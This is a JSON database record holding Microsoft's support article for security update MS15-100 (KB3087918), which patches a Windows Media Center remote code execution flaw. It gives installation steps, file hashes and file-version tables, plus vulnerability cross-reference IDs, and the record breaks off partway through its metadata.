{"id": "KB3087918", "bulletinFamily": "microsoft", "title": "MS15-100: Vulnerability in Windows Media Center could allow remote code execution: September 8, 2015", "description": "<html><body><p>Resolves vulnerabilities in Microsoft Windows that could allow remote code execution if a user opens a specially crafted toolbar object in Windows or an attacker convinces a user to view specially crafted content online.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if Windows Media Center opens a specially crafted Media Center link (.mcl) file that references malicious code. An attacker who successfully exploits this vulnerability could gain the same user rights as the current user. Customers whose accounts are configured to have fewer user rights on the system could be less affected than those who operate with administrative user rights. <br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/ms15-100\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS15-100</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><ul class=\"sbody-free_list\"><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-3\" target=\"_self\">Add language packs to Windows</a>.<br/></li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><a class=\"bookmark\" id=\"obtaintheupdate\"></a><h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see<br/><a href=\"https://www.microsoft.com/security/pc-security/updates.aspx\" id=\"kb-link-5\" target=\"_self\">Stay up-to-date for more secure web browsing</a>.<br/></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Method 2: Microsoft Download Center</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">You can obtain the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.<br/><br/>Click the download link in <a href=\"https://technet.microsoft.com/library/security/ms15-100\" id=\"kb-link-6\" target=\"_self\">Microsoft Security Bulletin MS15-100</a> that corresponds to the version of Windows that you are running.<br/></div><br/></span></div></div></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><h4 class=\"sbody-h4\"> Windows Vista (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3087918-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3087918-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-7\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">In some cases, this update does not require a system restart. If the required files are being used, this update will require a system restart. If this behavior occurs, you receive a message that advises you to restart your system.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under Windows Update, click <span class=\"text-base\">View installed updates</span>, and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a bookmark-id=\"fileinfo\" href=\"#fileinfo\" managed-link=\"\" target=\"\">file information</a> section.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows 7 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3087918-x86.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3087918-x64.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-8\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">In some cases, this update does not require a system restart. If the required files are being used, this update will require a system restart. If this behavior occurs, you receive a message that advises you to restart your system.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the /Uninstall setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then under Windows Update, click <span class=\"text-base\">View installed updates</span>, and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a bookmark-id=\"fileinfo\" href=\"#fileinfo\" managed-link=\"\" target=\"\">file information</a> section.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows 8 and Windows 8.1 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8:<br/><span class=\"text-base\">Windows8-RT-KB3087918-x86.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8:<br/><span class=\"text-base\">Windows8-RT-KB3087918-x64.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3087918-x86.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3087918-x64.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-9\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">In some cases, this update does not require a system restart. If the required files are being used, this update will require a system restart. If this behavior occurs, you receive a message that advises you to restart your system.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, click <span class=\"text-base\">Windows Update</span>, and then under See also, click <span class=\"text-base\">Installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a bookmark-id=\"fileinfo\" href=\"#fileinfo\" managed-link=\"\" target=\"\">file information</a> section.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">File hash information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">SHA1 hash</th><th class=\"sbody-th\">SHA256 hash</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3087918-x86.msu</td><td class=\"sbody-td\">21020BF7ECC617FFF6C248A22E00C6C488A41416</td><td class=\"sbody-td\">6BB97317BF126D54D710BF6D5C70E3F7C3E3EEB32F286B07D9085D658C1DF972</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3087918-x64.msu</td><td class=\"sbody-td\">695A546FC6E6C211FE59A4EA93FF9CD59049B361</td><td class=\"sbody-td\">78BB9CF0DA542DB1EB50D37BAF3EF340AB8345CBD79BAABCC27117F40689D9A3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3087918-x86.msu</td><td class=\"sbody-td\">75F93A0B6095866FA5E77732879DE2094B889133</td><td class=\"sbody-td\">DABBC8155AF38E44AD38DDC954911C337C56433241328B3342864802BC7282C5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3087918-x64.msu</td><td class=\"sbody-td\">9478941DFAF0AB45CDFE96F3A2235ACCC4EDE767</td><td class=\"sbody-td\">1E3D4E4D2F4D97045581C203851076804FE17AF3AB36CFE06E36AE98B5F21928</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3087918-x86.msu</td><td class=\"sbody-td\">3421AE5504D9F6D56318B5CDDD34A330C71BDEC4</td><td class=\"sbody-td\">A3518B2FD1275580C489F45D16ABAD6EB5001832E0AC437FD0EA18A13B61B8AC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3087918-x64.msu</td><td class=\"sbody-td\">F711944EE823859F198B3BF73674B795F6888050</td><td class=\"sbody-td\">3152DEE90D49758C0A34522C3898431E3C87BEBA7D52D9567130698C291729BF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3087918-v2-x64.msu</td><td class=\"sbody-td\">E840A08DFC45D29A9B63023C00D0F3DF28F2EDED</td><td class=\"sbody-td\">FBF0F4A93C97D3CE5EC64E106EED9F33D18DD56BF9D91D7CEC95EB3277ECA8B1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3087918-v2-x86.msu</td><td class=\"sbody-td\">AFF938D189153F0A9BAC822FABACFD574288C828</td><td class=\"sbody-td\">700A886EB921DA89D67F4F4C6AE1DCA0C2BC64246D2A7FDAF64AF5CA2F5889FA</td></tr></table></div></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">File information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time and with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.<br/><br/><br/><h3 class=\"sbody-h3\">Windows Vista file information</h3><div class=\"kb-collapsible kb-collapsible-collapsed\"><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (SP<strong class=\"sbody-strong\">n</strong>), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table:<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\"><span class=\"text-base\">Version</span></th><th class=\"sbody-th\"><span class=\"text-base\">Product</span></th><th class=\"sbody-th\"><span class=\"text-base\">Milestone</span></th><th class=\"sbody-th\"><span class=\"text-base\">Service branch</span></th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">2</span>.<span class=\"text-base\">19</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">2</span>.<span class=\"text-base\">23</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes.</li></ul><span class=\"text-base\">Note</span> The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.<br/><br/><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows Vista</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.0.6002.19478</td><td class=\"sbody-td\">4,059,136</td><td class=\"sbody-td\">14-Aug-2015</td><td class=\"sbody-td\">13:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.0.6002.23788</td><td class=\"sbody-td\">4,059,136</td><td class=\"sbody-td\">14-Aug-2015</td><td class=\"sbody-td\">13:44</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows Vista</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.0.6002.19478</td><td class=\"sbody-td\">4,059,136</td><td class=\"sbody-td\">14-Aug-2015</td><td class=\"sbody-td\">13:48</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.0.6002.23788</td><td class=\"sbody-td\">4,059,136</td><td class=\"sbody-td\">14-Aug-2015</td><td class=\"sbody-td\">13:48</td><td class=\"sbody-td\">x86</td></tr></table></div><h3 class=\"sbody-h3\">Windows 7 file information</h3><div class=\"kb-collapsible kb-collapsible-collapsed\"><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (RTM, SP<strong class=\"sbody-strong\">n</strong>), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table: <br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\"><span class=\"text-base\">Version</span></th><th class=\"sbody-th\"><span class=\"text-base\">Product</span></th><th class=\"sbody-th\"><span class=\"text-base\">Milestone</span></th><th class=\"sbody-th\"><span class=\"text-base\">Service branch</span></th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.760<span class=\"text-base\">1</span>.<span class=\"text-base\">18</span>xxx</td><td class=\"sbody-td\">Windows 7</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.760<span class=\"text-base\">1</span>.<span class=\"text-base\">22</span>xxx</td><td class=\"sbody-td\">Windows 7</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes.</li></ul><span class=\"text-base\">Note</span> The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.<br/><br/><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows 7</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.1.7601.18968</td><td class=\"sbody-td\">6,307,840</td><td class=\"sbody-td\">13-Aug-2015</td><td class=\"sbody-td\">17:50</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.1.7601.23171</td><td class=\"sbody-td\">6,307,840</td><td class=\"sbody-td\">13-Aug-2015</td><td class=\"sbody-td\">19:29</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows 7</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.1.7601.18968</td><td class=\"sbody-td\">6,307,840</td><td class=\"sbody-td\">13-Aug-2015</td><td class=\"sbody-td\">17:50</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.1.7601.23171</td><td class=\"sbody-td\">6,307,840</td><td class=\"sbody-td\">13-Aug-2015</td><td class=\"sbody-td\">19:29</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows 7 Embedded </h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.1.7600.16821</td><td class=\"sbody-td\">5,705,424</td><td class=\"sbody-td\">30-Sep-2015</td><td class=\"sbody-td\">17:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.1.7600.16821</td><td class=\"sbody-td\">5,705,424</td><td class=\"sbody-td\">30-Sep-2015</td><td class=\"sbody-td\">17:12</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows 7 Embedded </h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.1.7600.16821</td><td class=\"sbody-td\">5,705,424</td><td class=\"sbody-td\">30-Sep-2015</td><td class=\"sbody-td\">17:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.1.7600.16821</td><td class=\"sbody-td\">5,705,424</td><td class=\"sbody-td\">30-Sep-2015</td><td class=\"sbody-td\">17:36</td><td class=\"sbody-td\">x86</td></tr></table></div><h3 class=\"sbody-h3\">Windows 8 file information</h3><div class=\"kb-collapsible kb-collapsible-collapsed\"><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (RTM,SP<strong class=\"sbody-strong\">n</strong>), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table:<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\"><span class=\"text-base\">Version</span></th><th class=\"sbody-th\"><span class=\"text-base\">Product</span></th><th class=\"sbody-th\"><span class=\"text-base\">Milestone</span></th><th class=\"sbody-th\"><span class=\"text-base\">Service branch</span></th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.2.920 <span class=\"text-base\">0.16</span> xxx</td><td class=\"sbody-td\">Windows 8</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.2.920 <span class=\"text-base\">0.20</span> xxx</td><td class=\"sbody-td\">Windows 8</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes.</li></ul><span class=\"text-base\">Note</span> The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.<br/><br/><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows 8</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.2.9200.17486</td><td class=\"sbody-td\">6,315,520</td><td class=\"sbody-td\">15-Aug-2015</td><td class=\"sbody-td\">00:32</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.2.9200.21601</td><td class=\"sbody-td\">6,315,520</td><td class=\"sbody-td\">15-Aug-2015</td><td class=\"sbody-td\">06:22</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows 8</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.2.9200.17486</td><td class=\"sbody-td\">6,315,520</td><td class=\"sbody-td\">15-Aug-2015</td><td class=\"sbody-td\">00:32</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.2.9200.21601</td><td class=\"sbody-td\">6,315,520</td><td class=\"sbody-td\">15-Aug-2015</td><td class=\"sbody-td\">06:22</td><td class=\"sbody-td\">x86</td></tr></table></div><h3 class=\"sbody-h3\">Windows 8.1 file information</h3><div class=\"kb-collapsible kb-collapsible-collapsed\"><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (RTM,SP<strong class=\"sbody-strong\">n</strong>), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table:<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\"><span class=\"text-base\">Version</span></th><th class=\"sbody-th\"><span class=\"text-base\">Product</span></th><th class=\"sbody-th\"><span class=\"text-base\">Milestone</span></th><th class=\"sbody-th\"><span class=\"text-base\">Service branch</span></th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.3.920 <span class=\"text-base\">0.16</span> xxx</td><td class=\"sbody-td\">Windows 8.1</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">GDR</td></tr></table></div></li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes.</li></ul><span class=\"text-base\">Note</span> The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.<br/><br/><br/><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows 8.1</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.3.9600.18015</td><td class=\"sbody-td\">6,315,520</td><td class=\"sbody-td\">17-Aug-2015</td><td class=\"sbody-td\">18:39</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows 8.1</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ehshell.dll</td><td class=\"sbody-td\">6.3.9600.18015</td><td class=\"sbody-td\">6,315,520</td><td class=\"sbody-td\">17-Aug-2015</td><td class=\"sbody-td\">18:39</td><td class=\"sbody-td\">x86</td></tr></table></div></div><br/></div></div></div></div></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-10\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-11\" target=\"_self\">TechNet Security troubleshooting and support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-12\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-13\" target=\"_self\">International support</a></div><br/></span></div></div></div></div></body></html>", "published": "2015-09-08T00:00:00", "modified": "2015-10-13T17:06:54", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://support.microsoft.com/en-us/help/3087918/", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2015-2509"], "type": "mskb", "lastseen": "2021-01-01T22:52:39", "edition": 16, "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-2509"]}, {"type": "symantec", "idList": ["SMNTC-76594"]}, {"type": "exploitdb", "idList": ["EDB-ID:38195", "EDB-ID:38151"]}, {"type": "kaspersky", "idList": ["KLA10660", "KLA10656"]}, {"type": "zdt", "idList": ["1337DAY-ID-24239", "1337DAY-ID-24254"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS15_100_MCL_EXE"]}, {"type": "saint", "idList": ["SAINT:4CA1F529427C102E6F0EC6756A18AFB9", "SAINT:4D0568C2D53113C0B8239CE4375D3176", "SAINT:43FDDF5D8ADC72CD1D2E623A21D14E03"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805737"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:133540"]}, {"type": "canvas", "idList": ["MS15_100"]}, {"type": "nessus", "idList": ["SMB_NT_MS15-100.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14689"]}], "modified": "2021-01-01T22:52:39", "rev": 